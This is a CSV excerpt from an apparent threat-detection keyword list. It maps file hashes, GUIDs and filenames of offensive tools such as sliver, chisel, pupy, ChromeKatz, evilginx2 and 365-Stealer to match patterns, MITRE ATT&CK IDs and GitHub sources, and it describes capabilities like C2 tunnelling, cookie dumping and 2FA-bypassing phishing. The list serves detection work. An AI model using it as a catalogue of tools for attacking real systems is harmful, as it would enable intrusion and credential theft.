"*3318d1dd3fcab5f3e4ab3cc5b690a3f4*",".{0,1000}3318d1dd3fcab5f3e4ab3cc5b690a3f4.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*332346668c99d0c6bd383f9a0f6c32e7ea3cedf4788468d1d373d3f106f4469d*",".{0,1000}332346668c99d0c6bd383f9a0f6c32e7ea3cedf4788468d1d373d3f106f4469d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*33323e73135262eaea63742b1c638a42fd535238c2bf2e6baa1b42fb593b0ddd*",".{0,1000}33323e73135262eaea63742b1c638a42fd535238c2bf2e6baa1b42fb593b0ddd.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*335628fdb196d750906961db6ce9ec4c35fb7c16f6883c441c6c620468e273c1*",".{0,1000}335628fdb196d750906961db6ce9ec4c35fb7c16f6883c441c6c620468e273c1.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*33571B09-4E94-43CB-ABDC-0226D769E701*",".{0,1000}33571B09\-4E94\-43CB\-ABDC\-0226D769E701.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","8","6","558","57","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z" "*335ac01e952db33997b844a2e7c506d541e353d6e82ead3fde51e4879fde736a*",".{0,1000}335ac01e952db33997b844a2e7c506d541e353d6e82ead3fde51e4879fde736a.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*337ED7BE-969A-40C4-A356-BE99561F4633*",".{0,1000}337ED7BE\-969A\-40C4\-A356\-BE99561F4633.{0,1000}","offensive_tool_keyword","CoercedPotato","CoercedPotato From Patate (LOCAL/NETWORK SERVICE) to SYSTEM by abusing SeImpersonatePrivilege on Windows 10 Windows 11 and Server 2022.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Prepouce/CoercedPotato","1","0","N/A","10","3","259","63","2023-11-03T20:58:26Z","2023-09-11T19:04:29Z" "*337ED7BE-969A-40C4-A356-BE99561F4633*",".{0,1000}337ED7BE\-969A\-40C4\-A356\-BE99561F4633.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","0","N/A","10","2","172","27","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z" "*33a286f3a77dd581011f646b2b96e6ac55f2d6a7cca7fdc3d4a0b45d063d912b*",".{0,1000}33a286f3a77dd581011f646b2b96e6ac55f2d6a7cca7fdc3d4a0b45d063d912b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*33a6ca1dea55d7cd2edc7d25de16ce7689fcfc7c51fb2f26ebe1a07a3c81c017*",".{0,1000}33a6ca1dea55d7cd2edc7d25de16ce7689fcfc7c51fb2f26ebe1a07a3c81c017.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","N/A","7","1","60","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z" "*33b7357209a182696c26be19723b759608d453a6492e9ee57abf619c7c44de61*",".{0,1000}33b7357209a182696c26be19723b759608d453a6492e9ee57abf619c7c44de61.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*33BF8AA2-18DE-4ED9-9613-A4118CBFC32A*",".{0,1000}33BF8AA2\-18DE\-4ED9\-9613\-A4118CBFC32A.{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","0","N/A","10","2","126","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" "*33c0ff5f78f090a28573baf8ad735c82728c289a7ddf80df5bbf90c794cd7f39*",".{0,1000}33c0ff5f78f090a28573baf8ad735c82728c289a7ddf80df5bbf90c794cd7f39.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*33c9dbfdd337a5fb8cc15a62bc9800d9a58799ccf21cb1b9bf3e7b7754c5eca2*",".{0,1000}33c9dbfdd337a5fb8cc15a62bc9800d9a58799ccf21cb1b9bf3e7b7754c5eca2.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*33ccc2fca462fcf743513e4f01ebe3b7302e0158a44b8dfa1f3e56b78b3ff0be*",".{0,1000}33ccc2fca462fcf743513e4f01ebe3b7302e0158a44b8dfa1f3e56b78b3ff0be.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*33ff6cd5604aa7d47c048e328546a890a4e5eb1cbbb578aeb78c41454d449212*",".{0,1000}33ff6cd5604aa7d47c048e328546a890a4e5eb1cbbb578aeb78c41454d449212.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*3404870416355a3fb4bf2d43695606b77785e6fbf534f2f6a536861ffcc9de81*",".{0,1000}3404870416355a3fb4bf2d43695606b77785e6fbf534f2f6a536861ffcc9de81.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*340ce55adab1112723a9947962c3557daeb2ed12fdb535f99dd8b66682356ebf*",".{0,1000}340ce55adab1112723a9947962c3557daeb2ed12fdb535f99dd8b66682356ebf.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*340df9bf5aa4527010e535905f4e4926e70b7d6b7716491638a920c37d717a34*",".{0,1000}340df9bf5aa4527010e535905f4e4926e70b7d6b7716491638a920c37d717a34.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*3422b5b6a7d4b662727baf8a4615c884a4295b71b8d0412130415b737a4cd216*",".{0,1000}3422b5b6a7d4b662727baf8a4615c884a4295b71b8d0412130415b737a4cd216.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","0","N/A","10","3","293","47","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z" "*3425d6a0a29537eb9bc8e98680cff7dd16280122f59ef4eb03d7a48760c053a7*",".{0,1000}3425d6a0a29537eb9bc8e98680cff7dd16280122f59ef4eb03d7a48760c053a7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*3461b057cfdf4259e44f40a0ad4490da3dd8ec511048f9eeac3dd224284a72d0*",".{0,1000}3461b057cfdf4259e44f40a0ad4490da3dd8ec511048f9eeac3dd224284a72d0.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*349f76bc4ae2326df15117c4b0c20a5e8a0f3491e83e7ea15fdbd02d67e45e8e*",".{0,1000}349f76bc4ae2326df15117c4b0c20a5e8a0f3491e83e7ea15fdbd02d67e45e8e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*3504F678-95FA-4DB2-8437-31A927CABC16*",".{0,1000}3504F678\-95FA\-4DB2\-8437\-31A927CABC16.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*35151960809a922f735b9492d55792b5cbcef5f3f47060ef484f92f63fe751a9*",".{0,1000}35151960809a922f735b9492d55792b5cbcef5f3f47060ef484f92f63fe751a9.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*354a7236afe220e7c831129fbf32434edd1d18961118dfb05279ff5c1b6f38ad*",".{0,1000}354a7236afe220e7c831129fbf32434edd1d18961118dfb05279ff5c1b6f38ad.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","N/A","9","7","N/A","N/A","N/A","N/A" "*354f17db4f3eeff8cbfd56f6aabea68deb7045572ba55298bbfb1e355c98a246*",".{0,1000}354f17db4f3eeff8cbfd56f6aabea68deb7045572ba55298bbfb1e355c98a246.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*355c68b197356e23687866e8ea8068ac29b62e3bb4657b9180729eebce44d7a9*",".{0,1000}355c68b197356e23687866e8ea8068ac29b62e3bb4657b9180729eebce44d7a9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*3560411a4c3ed8e9229e7684be1c002f39cdaa5482c6d5046984d4be7985a594*",".{0,1000}3560411a4c3ed8e9229e7684be1c002f39cdaa5482c6d5046984d4be7985a594.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*35678541d1d3a394875f58f3add9b097f445dc15de0a720318da1db4d1de06e8*",".{0,1000}35678541d1d3a394875f58f3add9b097f445dc15de0a720318da1db4d1de06e8.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*356fc0b7eacb629e745a774a22e5ed1f82aea70dc9bc420a1d71b9d28ef27830*",".{0,1000}356fc0b7eacb629e745a774a22e5ed1f82aea70dc9bc420a1d71b9d28ef27830.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*357b50be2506c10d74d5792d52cfd892155540741f3dbf270eefcffe6884fd14*",".{0,1000}357b50be2506c10d74d5792d52cfd892155540741f3dbf270eefcffe6884fd14.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*35cc4208d80e7a202cef1cf17f6a2d1a629400410eaccecdb70c3c85f79ec431*",".{0,1000}35cc4208d80e7a202cef1cf17f6a2d1a629400410eaccecdb70c3c85f79ec431.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*35d295a5f04094a88ddf9c0704c8555bcaf980d9eb15505549f2ace647324cd6*",".{0,1000}35d295a5f04094a88ddf9c0704c8555bcaf980d9eb15505549f2ace647324cd6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*35d9023ac28fe49540ae16d224a8edc09c97a12edfea883e48de778730cc2d3a*",".{0,1000}35d9023ac28fe49540ae16d224a8edc09c97a12edfea883e48de778730cc2d3a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*3622f69f847b1fd331363a847f626b9931363c81946b6d6e7441dc0959b4d971*",".{0,1000}3622f69f847b1fd331363a847f626b9931363c81946b6d6e7441dc0959b4d971.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*3655a757ef5f8d849bb61132c30e20848cd88ce2233abf1ca71e029ec7572fc4*",".{0,1000}3655a757ef5f8d849bb61132c30e20848cd88ce2233abf1ca71e029ec7572fc4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*365-Stealer.py*",".{0,1000}365\-Stealer\.py.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","1","N/A","10","4","386","82","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" "*365-Stealer-master*",".{0,1000}365\-Stealer\-master.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","1","N/A","10","4","386","82","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" "*366294485d6a2c872b0ebf033cb129a23ed2fce4ca2dc3e7905cb49a808ba7a6*",".{0,1000}366294485d6a2c872b0ebf033cb129a23ed2fce4ca2dc3e7905cb49a808ba7a6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*3688991da39646b2fb375ce860fc34e29341598abb35e10ddc9f4650460a1f2c*",".{0,1000}3688991da39646b2fb375ce860fc34e29341598abb35e10ddc9f4650460a1f2c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*3697e7b61d4f49ead950dfcc75560c457c836fcbc9f81b15b2041eb2a7a5171c*",".{0,1000}3697e7b61d4f49ead950dfcc75560c457c836fcbc9f81b15b2041eb2a7a5171c.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*36a659bab7eec62733d13b9e7f8a6ae891cfaf7cd2ec36824bf41f7e6b706944*",".{0,1000}36a659bab7eec62733d13b9e7f8a6ae891cfaf7cd2ec36824bf41f7e6b706944.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*36b45b5ab3cbd980c5ca2c3bd229525e7dd937a0eb2e53347dfa2671cf27d859*",".{0,1000}36b45b5ab3cbd980c5ca2c3bd229525e7dd937a0eb2e53347dfa2671cf27d859.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" 